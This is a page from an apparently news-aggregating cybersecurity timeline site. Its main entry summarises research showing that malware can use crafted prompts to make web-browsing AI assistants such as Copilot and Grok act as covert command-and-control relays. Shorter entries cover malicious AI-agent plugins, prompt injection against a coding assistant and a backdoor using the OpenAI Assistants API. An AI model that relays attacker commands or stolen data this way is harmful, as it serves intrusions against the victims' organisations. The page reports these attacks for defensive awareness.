CyberHappenings logo

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

AI Assistants Abused as Command-and-Control Proxies

First reported
Last updated
3 unique sources, 3 articles

Summary

Hide ▲

Researchers have demonstrated that AI assistants like Microsoft Copilot and xAI Grok can be exploited as command-and-control (C2) proxies. This technique leverages the AI's web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed AI as a C2 proxy, allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion. The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. This approach bypasses traditional defenses like API key revocation or account suspension. According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return responses. The AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account. The method relies on AI assistants that support URL fetching and content summarization, allowing attackers to tunnel encoded data through query parameters and receive embedded commands in the AI's reply. Malware can interact with the AI interface invisibly using a WebView2 browser component inside a C++ program. The research also outlined a broader trend: malware that integrates AI into its runtime decision-making, sending host information to a model and receiving guidance on actions to prioritize.

Timeline

  1. 17.02.2026 20:08 3 articles · 2d ago

    AI Assistants Abused as Command-and-Control Proxies

    Researchers have demonstrated that AI assistants like Microsoft Copilot and xAI Grok can be exploited as command-and-control (C2) proxies. This technique leverages the AI's web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed AI as a C2 proxy, allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion. The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. This approach bypasses traditional defenses like API key revocation or account suspension. According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return responses. The AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account. The method relies on AI assistants that support URL fetching and content summarization, allowing attackers to tunnel encoded data through query parameters and receive embedded commands in the AI's reply. Malware can interact with the AI interface invisibly using a WebView2 browser component inside a C++ program. The research also outlined a broader trend: malware that integrates AI into its runtime decision-making, sending host information to a model and receiving guidance on actions to prioritize.

    Show sources

Information Snippets

Similar Happenings

Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.

AI Workflow Security Risks Highlighted by Recent Attacks

Recent incidents demonstrate that the primary risk in AI systems lies not in the models themselves but in the workflows that integrate them. Two Chrome extensions stole ChatGPT and DeepSeek chat data from over 900,000 users, while prompt injections tricked IBM's AI coding assistant into executing malware. These attacks exploit the context and integrations of AI systems, highlighting the need for comprehensive workflow security. AI models are increasingly embedded in business processes, automating tasks and connecting applications. This integration creates new attack surfaces, as AI systems rely on probabilistic decision-making and lack native trust boundaries. Traditional security controls are inadequate for these dynamic and context-dependent workflows. To mitigate these risks, organizations should treat the entire workflow as the security perimeter, implementing guardrails and monitoring for anomalies. Dynamic SaaS security platforms like Reco can help by providing real-time visibility and control over AI usage.

Rise of Dynamic AI-SaaS Security to Address AI Copilot Risks

The proliferation of AI copilots and agents within SaaS applications has introduced new security challenges. These AI tools operate at machine speed, traverse multiple systems, and often wield higher privileges, making them difficult to monitor with traditional static security models. As a result, dynamic AI-SaaS security solutions are emerging to provide real-time monitoring, adaptive policy enforcement, and detailed auditability of AI agent activities. Security teams are urged to adopt dynamic AI-SaaS security to maintain control over AI copilots and prevent misuse, data leaks, and other security incidents.

SesameOp malware leverages OpenAI Assistants API for command-and-control

A new backdoor malware, SesameOp, uses the OpenAI Assistants API as a covert command-and-control channel. The malware was discovered during an investigation into a July 2025 cyberattack. It allowed attackers to gain persistent access to compromised environments and remotely manage backdoored devices for several months. The attackers leveraged legitimate cloud services, avoiding detection and traditional incident response measures. The malware employs a combination of symmetric and asymmetric encryption to secure communications. It uses a heavily obfuscated loader and a .NET-based backdoor deployed through .NET AppDomainManager injection into Microsoft Visual Studio utilities. The attack chain includes internal web shells and malicious processes designed for long-term espionage. The malware uses a loader component named "Netapi64.dll" and a .NET-based backdoor named "OpenAIAgent.Netapi64". The malware supports three types of values in the description field of the Assistants list retrieved from OpenAI: SLEEP, Payload, and Result. Microsoft and OpenAI collaborated to investigate the abuse of the API, leading to the disabling of the account and API key used in the attacks. The malware does not exploit a vulnerability in OpenAI's platform but misuses built-in capabilities of the Assistants API. The OpenAI Assistants API is scheduled for deprecation in August 2026 and will be replaced by a new Responses API.

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers. Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. Beukema documented four previously unknown techniques for manipulating Windows LNK shortcut files to hide malicious targets from users inspecting file properties. The discovered issues exploit inconsistencies in how Windows Explorer prioritizes conflicting target paths specified across multiple optional data structures within shortcut files. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique identified involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries. Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes. CVE-2025-9491 was widely exploited by at least 11 state-sponsored groups and cybercrime gangs, including Evil Corp, Bitter, APT37, APT43 (also known as Kimsuky), Mustang Panda, SideWinder, RedHotel, Konni, and others.